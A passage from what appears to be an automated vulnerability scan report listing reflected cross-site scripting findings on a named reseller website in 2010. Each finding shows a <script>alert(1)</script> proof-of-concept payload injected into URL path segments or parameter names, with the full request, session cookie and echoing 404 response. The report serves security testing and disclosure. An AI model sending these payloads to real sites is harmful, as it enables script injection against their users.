Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1cd3<script>alert(1)</script>1199bbafdc2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themesf1cd3<script>alert(1)</script>1199bbafdc2/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themesf1cd3<script>alert(1)</script>1199bbafdc2/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2111. http://www.resellerbase.com/detail/30/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 17c19<script>alert(1)</script>511f11550db was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos17c19<script>alert(1)</script>511f11550db/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos17c19<script>alert(1)</script>511f11550db/images/ was not found on this server.</p>
...[SNIP]...

2.2112. http://www.resellerbase.com/detail/30/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c32b2<script>alert(1)</script>0d877038323 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/imagesc32b2<script>alert(1)</script>0d877038323/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/imagesc32b2<script>alert(1)</script>0d877038323/ was not found on this server.</p>
...[SNIP]...

2.2113. http://www.resellerbase.com/detail/30/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 620b8<script>alert(1)</script>bbd1af11bdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/?620b8<script>alert(1)</script>bbd1af11bdb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/?620b8<script>alert(1)</script>bbd1af11bdb=1 was not found on this server.</p>
...[SNIP]...

2.2114. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6ba6c<script>alert(1)</script>ed16785de8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6ba6c<script>alert(1)</script>ed16785de8b/30/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6ba6c<script>alert(1)</script>ed16785de8b/30/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2115. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9677<script>alert(1)</script>9dc7f8fa4f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30f9677<script>alert(1)</script>9dc7f8fa4f1/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30f9677<script>alert(1)</script>9dc7f8fa4f1/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2116. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f135a<script>alert(1)</script>c7921080622 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themesf135a<script>alert(1)</script>c7921080622/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themesf135a<script>alert(1)</script>c7921080622/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2117. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5280<script>alert(1)</script>dae3e7fb1a3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmosb5280<script>alert(1)</script>dae3e7fb1a3/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmosb5280<script>alert(1)</script>dae3e7fb1a3/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2118. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a1d12<script>alert(1)</script>110526275cc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/imagesa1d12<script>alert(1)</script>110526275cc/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/imagesa1d12<script>alert(1)</script>110526275cc/rating/ was not found on this server.</p>
...[SNIP]...

2.2119. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload dec28<script>alert(1)</script>f16bdda44a6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/ratingdec28<script>alert(1)</script>f16bdda44a6/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/ratingdec28<script>alert(1)</script>f16bdda44a6/ was not found on this server.</p>
...[SNIP]...

2.2120. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f7734<script>alert(1)</script>ceb0c40f36a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/rating/?f7734<script>alert(1)</script>ceb0c40f36a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/?f7734<script>alert(1)</script>ceb0c40f36a=1 was not found on this server.</p>
...[SNIP]...

2.2121. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ea42<script>alert(1)</script>36f18794fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2ea42<script>alert(1)</script>36f18794fe/30/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2ea42<script>alert(1)</script>36f18794fe/30/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2122. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34e0e<script>alert(1)</script>a610264a474 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3034e0e<script>alert(1)</script>a610264a474/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3034e0e<script>alert(1)</script>a610264a474/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2123. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dd996<script>alert(1)</script>a23172e1e8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themesdd996<script>alert(1)</script>a23172e1e8c/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themesdd996<script>alert(1)</script>a23172e1e8c/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2124. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f266e<script>alert(1)</script>e1cff2e3f1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmosf266e<script>alert(1)</script>e1cff2e3f1/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmosf266e<script>alert(1)</script>e1cff2e3f1/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2125. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bfea6<script>alert(1)</script>f9287c9681a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/imagesbfea6<script>alert(1)</script>f9287c9681a/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/imagesbfea6<script>alert(1)</script>f9287c9681a/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2126. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8e78a<script>alert(1)</script>cf397cd02ac was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/rating8e78a<script>alert(1)</script>cf397cd02ac/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating8e78a<script>alert(1)</script>cf397cd02ac/0.gif was not found on this server.</p>
...[SNIP]...

2.2127. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 80b24<script>alert(1)</script>b2852b3b138 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/rating/0.gif80b24<script>alert(1)</script>b2852b3b138 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/0.gif80b24<script>alert(1)</script>b2852b3b138 was not found on this server.</p>
...[SNIP]...

2.2128. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 12bd5<script>alert(1)</script>9a94f1fa2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/rating/0.gif?12bd5<script>alert(1)</script>9a94f1fa2a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/0.gif?12bd5<script>alert(1)</script>9a94f1fa2a=1 was not found on this server.</p>
...[SNIP]...

2.2129. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23f42<script>alert(1)</script>4553f9da45c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail23f42<script>alert(1)</script>4553f9da45c/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:10 GMT
